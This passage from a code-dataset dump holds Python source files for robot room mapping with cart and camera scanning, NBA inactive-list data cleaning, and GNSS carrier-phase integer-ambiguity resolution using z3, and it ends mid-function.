HEAD_CAM cam\n    headFovH = 69.4 if 'cartControl' in config.processSimulated else mg.headCamProperties['fovH']\n    numPlannedCartRotationSteps = int(360 / headFovH)\n    cartRange = int(360 / (numPlannedCartRotationSteps + 1))\n\n    # start with an empty scan plan\n    config.fullScanPlan = np.zeros((MAP_WIDTH, MAP_HEIGHT), dtype=np.uint8)\n    config.fullScanPlanFat = np.zeros((MAP_WIDTH, MAP_HEIGHT), dtype=np.uint8)\n\n    # for all orientations of the cart\n    eyeFovH = mg.eyeCamProperties['fovH']\n    numPlannedHeadRotationSteps = int(cartRange / eyeFovH)\n    headRange = int(cartRange / (numPlannedHeadRotationSteps + 1))\n\n    while numPlannedCartRotationSteps > 0:\n\n        # request a cartcam picture, done in navMap thread\n        config.log(f\"take cartcam image, degrees: {config.oCart.getCartYaw()}\")\n        takeCartcamImage()\n\n        # take several Eyecam images and one 
depth image with this cart orientation\n if marker.scanWithHead(startDegrees= -cartRange/2 + headRange/2,\n endDegrees=cartRange/2 - headRange/2,\n steps=numPlannedHeadRotationSteps+1):\n\n # check for image processing done\n timeout = time.time() + 5\n while config.flagProcessCartcamImage and time.time() < timeout:\n time.sleep(0.1)\n if time.time() > timeout:\n config.log(f\"navMap, timeout processing CartcamImage, stopping scan\")\n return False\n\n while not config.flagAddObstaclesToMap and time.time() < timeout:\n time.sleep(0.1)\n if time.time() > timeout:\n config.log(f\"navMap, timeout processing DepthcamImage, stopping scan\")\n return False\n\n guiUpdate.guiUpdateQueue.append({'type': guiUpdate.updType.MAP})\n\n # rotate cart\n numPlannedCartRotationSteps -= 1\n depthXRange = config.cams[inmoovGlobal.HEAD_CAM]['fovH']\n relAngle = 360 - (numPlannedCartRotationSteps * depthXRange)\n nextDegrees = (relAngle + startAngle) % 360\n config.log(f\"start angle: {startAngle}, rotation steps: {numPlannedCartRotationSteps}, next degrees: {nextDegrees}\")\n\n if numPlannedCartRotationSteps > 0:\n try:\n #config.log(f\"rotation disabled for test\")\n if cartHandling.createMoveSequence(nextDegrees, 0, 0):\n cartHandling.moveCart()\n except Exception as e:\n config.log(f\"failure in cart rotation to {nextDegrees} degrees, {e}\")\n return False\n\n else:\n config.log(f\"scan with head failure\")\n return False # problems with scanWithHead\n\n if not config.fullScanDone:\n # save first floor plan\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlan.jpg\", config.floorPlan)\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanFat.jpg\", config.floorPlanFat)\n\n config.fullScanDone = True\n\n # TODO ask for room name\n saveMapInfo()\n\n imageName = buildImageName(config.depthCamX, config.depthCamY)\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanParts/fullScanPlan_{imageName}.jpg\", config.fullScanPlan)\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanParts/fullScanPlanFat_{imageName}.jpg\", config.fullScanPlanFat)\n\n # for additional full scans verify the alignment with the floor plan and adjust cart location\n if len(config.scanLocations) > 1:\n adjustCartLocation()\n\n addScanLocation() # let us remember we have been here, use corrected position\n\n\n # look out straight for next moves\n robotHandling.servoMoveToPosition('head.eyeY', 90)\n robotHandling.servoMoveToPosition('head.rothead', 90)\n\n # silence neck and rothead (head may move down though)\n robotHandling.servoSetAutoDetach('head.neck', 300)\n robotHandling.servoSetAutoDetach('head.rothead', 300)\n return True\n\n\ndef createImageFolders():\n \"\"\"\n copy existing room folder to folder ..._depricated\n create new empty room folders\n :return:\n \"\"\"\n config.log(f\"move current room to _depricated folder\")\n roomFolder = f\"{config.PATH_ROOM_DATA}/{config.room}\"\n if os.path.exists(roomFolder):\n if os.path.exists(roomFolder+\"_depricated\"):\n config.log(f\"remove _depricated folder\")\n try:\n shutil.rmtree(roomFolder+\"_depricated\", ignore_errors=True)\n except Exception as e:\n config.log(f\"could not remove roomFolder: {roomFolder}_depricated, error: {str(e)}\")\n return False\n\n config.log(f\"renamed current room folder to _depricated folder\")\n time.sleep(1)\n try:\n os.rename(roomFolder, roomFolder+\"_depricated\")\n except Exception as e:\n config.log(f\"can not rename roomFolder: {roomFolder} to {roomFolder}_depricated, 
error: {str(e)}\")\n\n if os.path.exists(roomFolder):\n config.log(f\"room folder still here, try to remove it\")\n try:\n #os.system(f\"rm -fr {roomFolder}\")\n shutil.rmtree(roomFolder, ignore_errors=True)\n time.sleep(1)\n except Exception as e:\n config.log(f\"could not remove roomFolder: {roomFolder}, error: {str(e)}\")\n return False\n\n config.log(f\"create empty folders\")\n floorPlanFolder = f\"{roomFolder}/floorPlan\"\n if not os.path.exists(floorPlanFolder):\n os.makedirs(floorPlanFolder)\n\n floorPlanPartsFolder = f\"{roomFolder}/floorPlan/floorPlanParts\"\n if not os.path.exists(floorPlanPartsFolder):\n os.makedirs(floorPlanPartsFolder)\n\n wallImagesFolder = f\"{roomFolder}/wallImages\"\n if not os.path.exists(wallImagesFolder):\n os.makedirs(wallImagesFolder)\n\n cartcamImagesFolder = f\"{roomFolder}/cartcamImages\"\n if not os.path.exists(cartcamImagesFolder):\n os.makedirs(cartcamImagesFolder)\n\n config.log(f\"delete scan and marker locations and move history\")\n scanLocationFile = f\"{roomFolder}/scanLocations.json\"\n if os.path.exists(scanLocationFile):\n os.remove(scanLocationFile)\n markerLocationFile = f\"{roomFolder}/markerLocations.json\"\n if os.path.exists(markerLocationFile):\n os.remove(markerLocationFile)\n moveHistoryFile = f\"{roomFolder}/moveHistory.json\"\n if os.path.exists(moveHistoryFile):\n os.remove(moveHistoryFile)\n\n config.log(f\"file work for new room done\")\n\n return True\n\n\ndef createFloorPlan():\n\n config.log(f\"clear folders for new floor plan\")\n if not createImageFolders():\n config.log(f\"could not remove room folder, open in exlorer/qdir?\")\n return False\n\n # until we have a map update function start with a clear floor plan\n clearFloorPlan()\n\n # set location in cartControl to 0\n if 'cartControl' not in config.processSimulated:\n config.servers['cartControl'].conn.root.setCartLocation(0, 0)\n\n return True\n\n\ndef rover():\n\n config.log(f\"in rover\")\n try:\n\n absDegree, distance = findNewScanLocation()\n if distance > 0:\n\n if cartHandling.createMoveSequence(absDegree, distance, 200):\n if cartHandling.moveCart():\n navManager.setTask(\"pop\")\n return\n else:\n config.log(f\"move to new scan location failed\")\n else:\n config.log(f\"no other scan location found\")\n\n except config.CartError as e:\n config.log(f\"rover - cart command unsuccessful {e}\")\n #except Exception as e:\n # config.log(f\"rover, unexpected exception in rover: {e}\")\n\n navManager.setTask(\"notask\")\n return\n\n\n\n","sub_path":"navMap.py","file_name":"navMap.py","file_ext":"py","file_size_in_byte":33305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"333248086","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis script performs simple cleaning operations on Inactive List data scraped\nusing \"inactivelist_scrape.py\". 
It reads in a .csv containing scraped data and\nsaves this cleaned data as a pickled Pandas dataframe.\n\n- Formats date\n- Formats team names\n- Formats names to match those in player stats; drops rows with missing data\n\nRequired Inputs:\n - 'prosportstransactions_scrape_IRL_2010_2019.csv'\n - 'teams_nickname_dictionary.p'\n - 'names_with_stats.p'\nOutputs:\n - 'inactive_list_cleaned.p'\n\n@author: evanl\n\"\"\"\nfrom player_name_standardizer import player_name_standardizer\nimport pandas as pd\nimport pickle\n\npd.set_option('display.expand_frame_repr', False)\n\n#-----------------------------User Inputs------------------------------------\n\n#path to scraped file\nscraped_file_path = '../../data/01_raw/prosportstransactions_scrape_IRL_2010_2019.csv'\n\n#save path and output filename\nsavepath='../../data/02_cleaned/inactive_list_cleaned.p'\n\n#path to team nickname dictionary (used to standardize team names)\nteam_pickle_path = '../../references/01_dictionaries/teams_nickname_dictionary.p'\n\n#path to Panda series of players with scraped player stats\nnames_file_path='../../data/02_cleaned/names_with_stats.p'\n\n#-------------------------Load Files-----------------------------------\n\n#Read in previously scraped Inactive List Data\ninactive_list_df = pd.read_csv(scraped_file_path,index_col = 0)\n\n#Read in team name dictionary (used to standardize team names)\nteam_name_dict = pickle.load(open( team_pickle_path, \"rb\" )) \n\n#Read in Panda series of player names with scraped player stats\nnames_with_stats_series = pickle.load(open(names_file_path, \"rb\" )) \n\n#-------------------Clean Data - Section 1: Format Date----------------------\n\n#Change \"Date\" values from object data type to a date data type and sort data frame by date (past ---> present)\ninactive_list_df['Date']=pd.to_datetime(inactive_list_df['Date'],infer_datetime_format=True)\ninactive_list_df.sort_values(by = 'Date', inplace = True)\ninactive_list_df.reset_index(drop = True, inplace = True)\n\n#----------------- Clean Data - Section 2: Format Team Names------------------\n\n#Change team name to full name with city and mascot\n#Handle special cases first (same mascot, two different cities - New Jersey Nets, Brooklyn Net, New Orleans Hornets, Charlotte Hornets)\ninactive_list_df.loc[((inactive_list_df['Team'] == 'Nets') & (inactive_list_df['Date'] <= pd.to_datetime('2012-06-18',infer_datetime_format=True))), 'Team'] = 'New Jersey Nets'\ninactive_list_df.loc[((inactive_list_df['Team'] == 'Nets') & (inactive_list_df['Date'] >= pd.to_datetime('2012-06-18',infer_datetime_format=True))), 'Team'] = 'Brooklyn Nets'\ninactive_list_df.loc[((inactive_list_df['Team'] == 'Hornets') & (inactive_list_df['Date'] <= pd.to_datetime('2013-06-18',infer_datetime_format=True))), 'Team'] = 'New Orleans Hornets'\ninactive_list_df.loc[((inactive_list_df['Team'] == 'Hornets') & (inactive_list_df['Date'] >= pd.to_datetime('2013-06-18',infer_datetime_format=True))), 'Team'] = 'Charlotte Hornets'\n\n#Map remaining teams to full team name using team_name_dict\ninactive_list_df['Team'] = inactive_list_df['Team'].map(team_name_dict)\n\n#Drop rows with no team name \ninactive_list_df.drop(index = inactive_list_df[inactive_list_df['Team'].isnull()].index, inplace = True)\n\n##---------------Clean Data - Section 3: Format Player Names-------------------\n\n#Check if any rows have a null for both \"Acquired\" and \"Relinquished\" columns; drop these rows\nacquired_null_df = inactive_list_df[inactive_list_df['Acquired'].isnull()]\nno_player_name_df = 
acquired_null_df[acquired_null_df['Relinquished'].isnull()]\ninactive_list_df.drop(no_player_name_df.index, inplace = True)\n\n#Separate out player names (some players have multiple names, each separated by a \"/\")\nall_events_names = inactive_list_df['Acquired'].fillna('') + inactive_list_df['Relinquished'].fillna('')\n\naliases_df = all_events_names.str.split(pat = '/', expand = True)\naliases_df.columns = ['Player', 'Alt_name_1', 'Alt_name_2'] \n\n#Remove any strings in parentheses in player names (removes parentheses and the string within the parentheses)\naliases_df.replace(regex = ['\\(.*?\\)'], value = '', inplace = True)\n\n#Remove suffixes on player names\naliases_df.replace(regex = ['Jr\\.'], value = '', inplace = True)\naliases_df.replace(regex = ['III'], value = '', inplace = True)\naliases_df.replace(regex = ['IV'], value = '', inplace = True)\n\n#Remove periods in player names\naliases_df['Player'].replace('\\.', '', regex=True, inplace = True)\naliases_df['Alt_name_1'].replace('\\.', '', regex=True, inplace = True)\naliases_df['Alt_name_2'].replace('\\.', '', regex=True, inplace = True)\n\n#Remove extra white spaces at the start or end of player names\naliases_df['Player']= aliases_df['Player'].str.strip()\naliases_df['Alt_name_1']= aliases_df['Alt_name_1'].str.strip()\naliases_df['Alt_name_2']= aliases_df['Alt_name_2'].str.strip()\n\n#Make player name spelling consistent with those in scraped stats data\n#Create a dictionary that will be used to map spellings\nplayer_spelling_dict = player_name_standardizer(aliases_df,names_with_stats_series)\n\n#Map panda series 'names_with_stats' player name spellings to 'missed_games_df'\naliases_df['Player'] = aliases_df['Player'].map(player_spelling_dict )\ninactive_list_df['Player'] = aliases_df['Player']\n\n#-----------------------Save Cleaned Data-----------------------------\nprint('Saving files......')\n\n#save file\npickle.dump(inactive_list_df, open(savepath, \"wb\" ) )\n\nprint('Finished')","sub_path":"src/d02_clean/clean_inactivelist.py","file_name":"clean_inactivelist.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"262670045","text":"\"\"\"\ncorrect for integer ambiguities in carrier phase data...\n\nThis file contains stuff I don't want to delete in case it's useful later,\nbut which I tried and found not to work/be necessary\n\"\"\"\n\nimport ctypes\nfrom laika.lib import coordinates\nfrom itertools import product\nimport math\nimport numpy\nfrom z3 import Solver, Optimize, Ints, Real, Reals, ToReal, sat, unsat\n\nimport tec\nimport tropo\n\nlambda_ws = {}\nlambda_ns = {}\nlambda_1s = {}\nlambda_2s = {}\nfor ident, freqs in tec.F_lookup.items():\n lambda_ws[ident] = tec.C/(freqs[0] - freqs[1])\n lambda_ns[ident] = tec.C/(freqs[0] + freqs[1])\n lambda_1s[ident] = tec.C/(freqs[0])\n lambda_2s[ident] = tec.C/(freqs[1])\n\nbrute = ctypes.CDLL(\"brute.so\")\nbrute.brute_force.restype = ctypes.c_double\nbrute.brute_force.argtypes = [\n ctypes.c_int32, ctypes.c_int32, # n1 and n2 double differences\n ctypes.c_void_p, # list of n1-n2 data\n ctypes.c_double, ctypes.c_double, # wavelengths\n ctypes.c_void_p, # Bi values\n ctypes.c_void_p, ctypes.c_void_p # output of best n1s and n2s\n]\nbrute.brute_force_harder.restype = ctypes.c_double\nbrute.brute_force_harder.argtypes = [\n ctypes.c_void_p, # list of n1-n2 data\n ctypes.c_double, ctypes.c_double, # wavelengths\n ctypes.c_void_p, # Bi values\n ctypes.c_void_p, ctypes.c_void_p # 
output of best n1s and n2s\n]\nbrute.brute_force_dd.restype = ctypes.c_double\nbrute.brute_force_dd.argtypes = [\n    ctypes.c_int32, # double difference\n    ctypes.c_double, # wavelength\n    ctypes.c_void_p, # bias values\n    ctypes.c_void_p, # output of best ns\n]\n\n\n\ndef frac_to_float(frac):\n    # helper function for z3\n    return (\n        frac.numerator_as_long()\n        / frac.denominator_as_long()\n    )\n\ndef double_difference(calculator, station_data, sta1, sta2, prn1, prn2, tick):\n    # generic double difference calculator\n    v11 = calculator(station_data[sta1][prn1][tick])\n    v12 = calculator(station_data[sta1][prn2][tick])\n    v21 = calculator(station_data[sta2][prn1][tick])\n    v22 = calculator(station_data[sta2][prn2][tick])\n\n    if any([v is None for v in {v11, v12, v21, v22}]):\n        return math.nan\n    \n    return (v11[0] - v12[0]) - (v21[0] - v22[0])\n\n\ndef phi_double_difference(station_data, sta1, sta2, prn1, prn2, tick):\n    # has to be same frequency bands for this to work\n    assert prn1[0] == prn2[0]\n\n    return double_difference(\n        tec.calc_carrier_delay,\n        station_data, sta1, sta2, prn1, prn2, tick\n    )\n\n\ndef widelane_ambiguity(station_data, sta1, sta2, prn1, prn2, tick):\n    \"\"\"\n    use mw double differences to get\n    (ddPhi_w - ddR_n)/lambda_w\n    which should be the widelane integer ambiguity\n    \"\"\"\n\n    diff = double_difference(\n        tec.melbourne_wubbena,\n        station_data, sta1, sta2, prn1, prn2, tick\n    )\n\n    if math.isnan(diff):\n        return diff\n    \n    lambda_w = lambda_ws[station_data[sta1][prn1][tick].prn[0]]\n    return diff / lambda_w\n\ndef dd_solve_(dd, vr1s1, vr1s2, vr2s1, vr2s2, wavelength):\n    sol = Solver()\n    r1s1, r1s2, r2s1, r2s2 = Ints('r1s1 r1s2 r2s1 r2s2')\n    err = Real('err')\n    err1, err2, err3, err4 = Reals('err1 err2 err3 err4')\n#    sol.add(err > 0)\n\n    sol.add(r1s1 - r1s2 - r2s1 + r2s2 == dd)\n\n    sol.add(ToReal(r1s1)*wavelength + err1 > vr1s1)\n    sol.add(ToReal(r1s1)*wavelength - err1 < vr1s1)\n\n    sol.add(ToReal(r1s2)*wavelength + err2 > vr1s2)\n    sol.add(ToReal(r1s2)*wavelength - err2 < vr1s2)\n\n    sol.add(ToReal(r2s1)*wavelength + err3 > vr2s1)\n    sol.add(ToReal(r2s1)*wavelength - err3 < vr2s1)\n\n    sol.add(ToReal(r2s2)*wavelength + err4 > vr2s2)\n    sol.add(ToReal(r2s2)*wavelength - err4 < vr2s2)\n\n    if sol.check() != sat:\n        return None\n    \n    def minimize():\n        # try to push the error lower, if possible\n        for mult in [0.5, 0.85]:\n            while sol.check() == sat:\n                sol.push()\n                sol.check()\n                err_bound = frac_to_float(sol.model()[err])\n                if err_bound < 0.2:\n                    # not gonna do better than that...\n                    return\n                sol.add(err < err_bound*mult)\n            sol.pop()\n            sol.check()\n    \n    minimize()\n    return (\n        [sol.model()[r].as_long() for r in [r1s1, r1s2, r2s1, r2s2]],\n        frac_to_float(sol.model()[err])\n    )\n\ndef dd_solve(dd, vr1s1, vr1s2, vr2s1, vr2s2, wavelength):\n    biases = numpy.array([vr1s1, vr1s2, vr2s1, vr2s2], dtype=numpy.double)\n    ns = numpy.array([0, 0, 0, 0], dtype=numpy.int32)\n\n    err = brute.brute_force_dd(\n        ctypes.c_int32(int(dd)),\n        ctypes.c_double(wavelength),\n        biases.ctypes.data,\n        ns.ctypes.data,\n    )\n    return ns, err, 0\n\ndef dd_solve_(dd, vr1s1, vr1s2, vr2s1, vr2s2, wavelength, ionosphere=False):\n    sol = Optimize()\n    r1s1, r1s2, r2s1, r2s2 = Ints('r1s1 r1s2 r2s1 r2s2')\n#    err = Real('err')\n    err1, err2, err3, err4 = Reals('err1 err2 err3 err4')\n#    sol.add(err > 0)\n\n    if ionosphere:\n        ion = Real('ion')\n        sol.add(ion > 0)\n        sol.add(ion < 25)\n    else:\n        ion = 0\n\n    sol.add(r1s1 - r1s2 - r2s1 + r2s2 == dd)\n\n    sol.add(ToReal(r1s1)*wavelength + err1 > vr1s1 - ion)\n    sol.add(ToReal(r1s1)*wavelength - err1 < vr1s1 - 
ion)\n\n sol.add(ToReal(r1s2)*wavelength + err2 > vr1s2 - ion)\n sol.add(ToReal(r1s2)*wavelength - err2 < vr1s2 - ion)\n\n sol.add(ToReal(r2s1)*wavelength + err3 > vr2s1 - ion)\n sol.add(ToReal(r2s1)*wavelength - err3 < vr2s1 - ion)\n\n sol.add(ToReal(r2s2)*wavelength + err4 > vr2s2 - ion)\n sol.add(ToReal(r2s2)*wavelength - err4 < vr2s2 - ion)\n\n objective = sol.minimize(err1 + err2 + err3 + err4)\n\n if sol.check() != sat:\n return None\n \n sol.lower(objective)\n if sol.check() != sat:\n return None\n\n return (\n [sol.model()[r].as_long() for r in [r1s1, r1s2, r2s1, r2s2]],\n [frac_to_float(sol.model()[err]) for err in [err1, err2, err3, err4]],\n frac_to_float(sol.model()[ion]) if ionosphere else 0\n )\n\ndef widelane_solve(dd, station_data, sta1, sta2, prn1, prn2, tick):\n vr1s1, lambda_w = tec.melbourne_wubbena(station_data[sta1][prn1][tick])\n vr1s2, _ = tec.melbourne_wubbena(station_data[sta1][prn2][tick])\n vr2s1, _ = tec.melbourne_wubbena(station_data[sta2][prn1][tick])\n vr2s2, _ = tec.melbourne_wubbena(station_data[sta2][prn2][tick])\n return dd_solve(dd, vr1s1, vr1s2, vr2s1, vr2s2, lambda_w)\n\ndef l1_ambiguity(station_data, sta1, sta2, prn1, prn2, tick):\n \"\"\"\n use widelane ambiguity and ionosphere free stuff\n to try to get l1 integer ambiguity\n \"\"\"\n\n # first estimate ionosphere free bias double difference\n def ionosphere_free_bias(*args):\n ret = tec.ionosphere_free(*args)\n if ret is not None:\n return ret[1] - ret[0], None\n \n ddbc = double_difference(\n ionosphere_free_bias,\n station_data, sta1, sta2, prn1, prn2, tick\n )\n\n nw = widelane_ambiguity(station_data, sta1, sta2, prn1, prn2, tick)\n if not math.isnan(nw):\n nw = round(nw)\n\n lambda_w = lambda_ws[station_data[sta1][prn1][tick].prn[0]]\n lambda_n = lambda_ns[station_data[sta1][prn1][tick].prn[0]]\n lambda_2 = lambda_2s[station_data[sta1][prn1][tick].prn[0]]\n\n return ddbc, ddbc / lambda_n - nw * lambda_w / lambda_2\n\n\n# earth's gravitational constant, this is slightly off in laika...\nmu = 398600441800000\ndef shapiro_cor(station_loc, sat_loc):\n \"\"\"\n general relativitistic correction factor\n \"\"\"\n station_r = numpy.linalg.norm(station_loc)\n sat_r = numpy.linalg.norm(sat_loc)\n distance_r = numpy.linalg.norm(station_loc - sat_loc)\n return (\n 2 * mu / tec.C**2 * numpy.log(\n (station_r + sat_r + distance_r)\n / (station_r + sat_r - distance_r)\n )\n )\n\ndef clock_cor(meas):\n return -2 * np.inner(meas.sat_pos, meas.sat_vel) / tec.C**2\n\n\n\ndef estimate_Bc(meas):\n# meas = station_data[sta][prn][tick]\n phase, pseudorange, wavelength = tec.ionosphere_free(meas)\n return phase - pseudorange, wavelength\n\ndef bias(signal):\n def f(meas):\n res = signal(meas)\n return res[0] - res[1], res[-1]\n return f\n\ndef geometry_free_solve(ddn1, ddn2, ws, station_data, sta1, sta2, prn1, prn2, ticks):\n lambda_1 = lambda_1s[prn1[0]]\n lambda_2 = lambda_2s[prn1[0]]\n\n # Φ_i - R_i = B_i + err with B_i = b_i + λ_1*N_1 - λ_2*N_2\n B_i = bias(tec.geometry_free)\n \n Bis = [0, 0, 0, 0]\n\n for i, (sta, prn) in enumerate(product([sta1, sta2], [prn1, prn2])):\n B_i_samples = []\n for tick in ticks:\n B_i_samples.append( B_i(station_data[sta][prn][tick])[0] )\n print(numpy.mean(B_i_samples), numpy.std(B_i_samples))\n Bis[i] = numpy.mean(B_i_samples)\n\n Bis = numpy.array(Bis, dtype=numpy.double)\n ws_ints = numpy.array(ws, dtype=numpy.int32)\n n1s = numpy.array([0, 0, 0, 0], dtype=numpy.int32)\n n2s = numpy.array([0, 0, 0, 0], dtype=numpy.int32)\n\n err = brute.brute_force(\n 
ctypes.c_int32(int(ddn1)),\n ctypes.c_int32(int(ddn2)),\n ws_ints.ctypes.data,\n ctypes.c_double(lambda_1),\n ctypes.c_double(lambda_2),\n Bis.ctypes.data,\n n1s.ctypes.data,\n n2s.ctypes.data\n )\n print(n1s, n2s, err)\n \"\"\"\n err = brute.brute_force_harder(\n ws_ints.ctypes.data,\n ctypes.c_double(lambda_1),\n ctypes.c_double(lambda_2),\n Bis.ctypes.data,\n n1s.ctypes.data,\n n2s.ctypes.data\n )\n print(n1s, n2s, err)\n \"\"\"\n return n1s, n2s, err\n\ndef geometry_free_solve_(ddn1, ddn2, ws, station_data, sta1, sta2, prn1, prn2, ticks):\n lambda_1 = lambda_1s[prn1[0]]\n lambda_2 = lambda_2s[prn1[0]]\n\n # Φ_i - R_i = B_i + err with B_i = b_i + λ_1*N_1 - λ_2*N_2\n B_i = bias(tec.geometry_free)\n \n sol = Optimize()\n# sol = Solver()\n errs = Reals('err_11 err_12 err_21 err_22')\n n1s = Ints('n1_11 n1_12 n1_21 n1_22')\n n2s = Ints('n2_11 n2_12 n2_21 n2_22')\n\n sol.add(n1s[0] - n1s[1] - n1s[2] + n1s[3] == ddn1)\n sol.add(n2s[0] - n2s[1] - n2s[2] + n2s[3] == ddn2)\n\n for i, (sta, prn) in enumerate(product([sta1, sta2], [prn1, prn2])):\n sol.add(n1s[i] - n2s[i] == ws[i])\n B_i_samples = []\n for tick in ticks:\n B_i_samples.append( B_i(station_data[sta][prn][tick])[0] )\n B_i_avg = numpy.mean(B_i_samples)\n# B_i_avg = B_i_samples[0]\n print(B_i_avg, numpy.std(B_i_samples))\n sol.add(lambda_1 * ToReal(n1s[i]) - lambda_2 * ToReal(n2s[i]) + errs[i] > B_i_avg)\n sol.add(lambda_1 * ToReal(n1s[i]) - lambda_2 * ToReal(n2s[i]) - errs[i] < B_i_avg)\n \"\"\"\n sol.add(errs[0] < .9)\n sol.add(errs[1] < .9)\n sol.add(errs[2] < .9)\n sol.add(errs[3] < .9)\n \"\"\"\n #sol.add(errs[0] + errs[1] + errs[2] + errs[3] < 17)\n objective = sol.minimize(errs[0] + errs[1] + errs[2] + errs[3])\n if sol.check() != sat:\n return None\n sol.lower(objective)\n if sol.check() != sat:\n return None\n# sol.add(errs[0] + errs[1] + errs[2] + errs[3] < 2)\n # can't do L2 norm with z3, L1 will have to do...\n# sol.(errs[0] + errs[1] + errs[2] + errs[3])\n\n \n return (\n [sol.model()[n1s[i]].as_long() for i in range(4)],\n [sol.model()[n2s[i]].as_long() for i in range(4)],\n [frac_to_float(sol.model()[errs[i]]) for i in range(4)],\n )\n\ndef test_n1_(N_w, station_data, sta, prn, ticks):\n # given N_w = N_1 - N_2\n # test out a N1/N2 combinations\n\n # get things that don't change base on N_1:\n # using N_w get b_w, delay_factor_w, B_c, B_i, wavelengths\n # for each N_1 candidate:\n # using N_w, N_1_candidate, B_c, estimate b_c, use that to get\n # a b_I estimate plug in to get ERR_1\n # using b_c, b_w, N_1_candidate, delay_factor_w, estimate b_I\n # and use that to get ERR_1\n\n lambda_1 = lambda_1s[prn[0]]\n lambda_2 = lambda_2s[prn[0]]\n lambda_n = lambda_ns[prn[0]]\n lambda_w = lambda_ws[prn[0]]\n\n b_w = numpy.mean([\n tec.melbourne_wubbena(station_data[sta][prn][tick]) for tick in ticks\n ]) - lambda_w * N_w\n\n freqs = tec.F_lookup[prn[0]]\n # TODO why are f1 and f2 reversed from what I expect?\n delay_factor_w = freqs[0]*freqs[1]/(freqs[1]**2 - freqs[0]**2)\n\n # TODO don't average out... 
look at results for each tick?\n B_c = numpy.mean([\n estimate_Bc(station_data[sta][prn][tick])[0] for tick in ticks\n ])\n gf_bias = bias(tec.geometry_free)\n B_i = numpy.mean([\n gf_bias(station_data[sta][prn][tick]) for tick in ticks\n ])\n\n\n N_1_best = None\n err_best = 10000\n\n for N_1_cand in range(-400, 400):\n N_2_cand = N_1_cand - N_w\n\n # TODO ???\n N_1_cand, N_2_cand = N_2_cand, N_1_cand\n\n b_c_meas = B_c - lambda_n * (N_1_cand + N_w * lambda_w / lambda_2)\n b_i_meas = B_i - lambda_1 * N_1_cand + lambda_2 * N_2_cand\n\n b_i_est = (b_w - b_c_meas) / delay_factor_w\n b_c_est = b_w - delay_factor_w * b_i_meas\n \n err1 = (b_i_est - b_i_meas)**2\n err2 = (b_c_est - b_c_meas)**2\n if err1 + err2 < err_best:\n err_best = err1 + err2\n N_1_best = N_1_cand\n return N_1_best, err_best\n\n\n\ndef solve_ambiguities(station_data, sta1, sta2, prn1, prn2, tick0, tickn):\n # step 0: remove ticks where we don't have all the data we need...\n # step 1: find widelane double difference to estimate ∆∇N_W\n # step 2: estimate ∆∇Bc and ∆∇N_W to estimate ∆∇N_1, ∆∇N_2\n # step 3: solve N_Ws\n # step 4: use ∆∇N_1, ∆∇N_2, N_Ws and measurements to estimate N1s and N2s\n\n # step 3: use fixed ∆∇N_1 to get better estimate of ∆∇Bc\n # step 4: use z3 and ∆∇Bc to estimate the actual Bc values\n # step 5: use Bc values to estimate N_1\n # step 6: use N_1 to estimate N_2 using the geometry free\n # combination\n\n # initialize wavelengths for this frequency band\n lambda_1 = lambda_1s[prn1[0]]\n lambda_2 = lambda_2s[prn1[0]]\n lambda_n = lambda_ns[prn1[0]]\n lambda_w = lambda_ws[prn1[0]]\n\n # step 0/1: remove ticks with bad data + get widelane dd (∆∇N_W)\n widelane_dds = []\n ticks = []\n\n for tick in range(tick0, tickn):\n w = widelane_ambiguity(station_data, sta1, sta2, prn1, prn2, tick)\n if math.isnan(w):\n continue\n widelane_dds.append(w)\n ticks.append(tick)\n\n widelane_dd = numpy.mean(widelane_dds)\n print(\"wideland double difference: {0:0.3f} +/- {1:0.4f}\".format(\n widelane_dd, numpy.std(widelane_dds)\n ))\n\n widelane_dd = round(widelane_dd)\n\n # step 2:\n # i) estimate ∆∇Bc\n ddbcs = [\n double_difference(\n bias(tec.ionosphere_free),\n station_data, sta1, sta2, prn1, prn2, tick\n ) for tick in ticks\n ]\n ddbc = numpy.mean(ddbcs)\n print(\"ionosphere free bias dd: {0:0.3f} +/- {1:0.4f}\".format(\n ddbc, numpy.std(ddbcs)\n ))\n\n # ii) estimate ∆∇N_1\n ddn1 = (ddbc / lambda_n) - (lambda_w * widelane_dd / lambda_2)\n print(\"n1 double difference: {0:0.3f}\".format(ddn1))\n ddn1 = round(ddn1)\n\n # ii) estimate ∆∇N_2 (N_W = N_1 - N_2)\n ddn2 = ddn1 - widelane_dd\n print(\"n2 double difference: {0:0.3f}\".format(ddn2))\n\n # TODO somehow ddn1 and ddn2 are swapped???\n #ddn1, ddn2 = ddn2, ddn1\n\n # step 3:\n # estimate N_Ws\n ws, errs, _ = widelane_solve(widelane_dd, station_data, sta1, sta2, prn1, prn2, ticks[0])\n print(ws)\n print(errs)\n\n return ( geometry_free_solve(ddn1, ddn2, ws, station_data, sta1, sta2, prn1, prn2, ticks) )\n\n\ndef solve_ambiguities_(station_data, sta1, sta2, prn1, prn2, tick0, tickn):\n # step 0: remove ticks where we don't have all the data we need...\n # step 1: find widelane double difference to estimate ∆∇N_W\n # step 2: solve N_Ws\n # step 3: use N_Ws to solve for probable N_1s\n\n # initialize wavelengths for this frequency band\n lambda_1 = lambda_1s[prn1[0]]\n lambda_2 = lambda_2s[prn1[0]]\n lambda_n = lambda_ns[prn1[0]]\n lambda_w = lambda_ws[prn1[0]]\n\n # step 0/1: remove ticks with bad data + get widelane dd (∆∇N_W)\n widelane_dds = []\n ticks = []\n\n 
